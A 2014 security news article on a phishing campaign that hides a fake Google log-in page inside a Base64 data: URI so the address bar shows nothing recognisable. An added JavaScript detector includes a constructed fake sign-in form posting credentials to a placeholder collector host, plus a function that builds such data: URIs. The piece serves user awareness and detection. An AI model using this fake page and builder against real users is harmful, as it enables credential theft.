A new phishing scheme is being used to steal Google Account credentials
by paganinip on May 15th, 2014
Security experts at Bitdefender have discovered an ingenious new phishing scheme that hackers are using to steal Google Account credentials.
The new phishing attack is hard to catch with traditional heuristic detection, and it mainly affects users of the Google Chrome and Mozilla Firefox browsers.
The hackers send an email that pretends to come from Google and warns the victim that his account will be locked within the next 24 hours because the associated inbox has reached its maximum capacity.
“With access to users’ Google accounts, hackers can buy apps on Google Play, hijack Google+ accounts and access confidential Google Drive documents,” reports Catalin Cosoi, chief security strategist at Bitdefender, in the official blog post. “The scam starts with an email allegedly sent by Google, with ‘Mail Notice’ or ‘New Lockout Notice’ as a subject.”
To prevent the account from being “locked in 24 hours”, the user is invited to click an “INSTANT INCREASE” link, but the link sends victims to a bogus Google log-in page. Using this artifice, the hackers capture the Google Account credentials the victim types into the browser.
Cosoi explained that it is very difficult for users to notice the attack because the fake Google log-in page is not served from a web address at all: it is delivered as a “data:” URI, and the attackers exploit the way Google Chrome displays such URIs in the address bar.
Users see “data:” at the start of the address bar, which indicates the use of the data Uniform Resource Identifier scheme. This scheme allows the attackers to embed the page content in-line, inside the URI itself, as if it were an external resource, so there is no hostname for the user to inspect.
“The scheme uses Base64 encoding to represent file contents, in this case supplying the content of the fake web page in an encoded string within the data URI. As Google Chrome doesn’t show the whole string, regular users have a hard time figuring out they are targeted in a phishing attack and may give their data to cyber-criminals,” states the post.
In short, the scammers avoid detection by packing the entire fake log-in page into a data URI: the page content, Base64-encoded, travels in-line in the URI string rather than being fetched from a hosted web page whose domain could be blocked or flagged, and the browser shows only the opening part of that string.
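The following script is an added example, not code from the Bitdefender post or from the campaign itself. It builds a data: URI the way the scam does (a Base64-encoded HTML log-in page), parses it back, and flags the decoded page when it contains a password field that posts to an absolute external URL; it also returns the short prefix that is all an address bar of a given width would show. The fake page, the collector hostname collector.example and all function names are constructed for the example.

```javascript
// Added example (not from the Bitdefender post): parse a data: URI of the kind
// used in the phishing campaign, decode its Base64 body, and flag the decoded
// HTML if it carries a login form that posts credentials to an external host.
// Runs under Node.js (Buffer and URL are globals).

// Constructed sample of a fake log-in page; stands in for the attacker's page.
// The action host collector.example is a placeholder, not a real indicator.
const FAKE_LOGIN_HTML = `<html><head><title>Google Accounts</title></head>
<body><form method="POST" action="http://collector.example/submit.php">
<input type="email" name="Email"><input type="password" name="Passwd">
<input type="submit" value="Sign in"></form></body></html>`;

// Build the data: URI the way the scam does: MIME type, ;base64, encoded body.
function buildDataUri(html, mime = 'text/html') {
  return `data:${mime};base64,${Buffer.from(html, 'utf8').toString('base64')}`;
}

// Split a data: URI into its parts (RFC 2397 layout). Returns null if the
// string is not a data: URI at all.
function parseDataUri(uri) {
  const m = /^data:([^,]*?)(;base64)?,(.*)$/s.exec(uri.trim());
  if (!m) return null;
  const mime = m[1] || 'text/plain;charset=US-ASCII';
  let body;
  if (m[2]) {
    body = Buffer.from(m[3], 'base64').toString('utf8');
  } else {
    try { body = decodeURIComponent(m[3]); } catch (e) { body = m[3]; }
  }
  return { mime, base64: Boolean(m[2]), body };
}

// Pull every <form> and the types of its <input> elements out of the HTML.
// A regex scan is enough for this heuristic; a real scanner would use a parser.
function extractForms(html) {
  const forms = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let f;
  while ((f = formRe.exec(html)) !== null) {
    const action = (/\baction\s*=\s*["']([^"']*)["']/i.exec(f[1]) || [])[1] || '';
    const inputs = [];
    const inputRe = /<input\b([^>]*)>/gi;
    let i;
    while ((i = inputRe.exec(f[2])) !== null) {
      const type = (/\btype\s*=\s*["']([^"']*)["']/i.exec(i[1]) || [])[1] || 'text';
      inputs.push(type.toLowerCase());
    }
    forms.push({ action, inputs });
  }
  return forms;
}

// Verdict: an in-line text/html page with a password field whose form posts to
// an absolute http(s) URL is treated as a credential-harvesting page.
// displayedPrefix is what an address bar of addressBarWidth characters shows:
// the data:text/html;base64, opener and a slice of Base64, nothing readable.
function assessDataUri(uri, addressBarWidth = 40) {
  const displayedPrefix = uri.slice(0, addressBarWidth);
  const parsed = parseDataUri(uri);
  if (!parsed) return { phishing: false, reasons: ['not a data: URI'], displayedPrefix };
  const reasons = [];
  if (parsed.base64) reasons.push('base64 body hides the page content from the address bar');
  let phishing = false;
  if (/^text\/html/i.test(parsed.mime)) {
    for (const form of extractForms(parsed.body)) {
      if (!form.inputs.includes('password')) continue;
      if (/^https?:\/\//i.test(form.action)) {
        phishing = true;
        reasons.push(`password form posts to external host ${new URL(form.action).host}`);
      } else {
        reasons.push('password form with relative or empty action');
      }
    }
  }
  return { phishing, reasons, displayedPrefix };
}

// Demonstration on the constructed sample.
const SAMPLE_URI = buildDataUri(FAKE_LOGIN_HTML);
const verdict = assessDataUri(SAMPLE_URI);
console.log('address bar shows:', verdict.displayedPrefix + '...');
console.log('phishing:', verdict.phishing, verdict.reasons);
```

The point of the displayedPrefix field is the one Cosoi makes: everything a user could recognise as suspicious sits in the Base64 tail that the address bar truncates. The same parse-then-inspect step can be applied to link targets found in mail bodies before a user ever clicks them, which is where a mail gateway would want it.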
According to Bitdefender, more than a thousand users have already been lured by the phishing scheme.
“So far, more than a thousand users clicked on a
single shortened URL used in the cyber-campaign. The numbers are without doubt
a lot higher, as scammers create more than a single URL when crafting
a phishing wave,” added Cosoi.
Phishing is one of the most popular fraudulent activities in the cyber criminal ecosystem, and according to the reports of the principal security firms, hackers are exploiting new platforms such as mobile and social media.
Cyber criminals are making phishing attacks harder to detect by refining their email targeting, and they keep finding new methods of bypassing the checks implemented by email providers and security firms.
A targeted attack usually exploits the “human factor”: phishing campaigns rely on social engineering techniques, which is why it is important to inform users of the tactics adopted by cyber criminals.
Organizations must train their personnel to reduce their human attack surface and avoid becoming victims of such attacks.
Be careful!
(Security Affairs – Google account, phishing)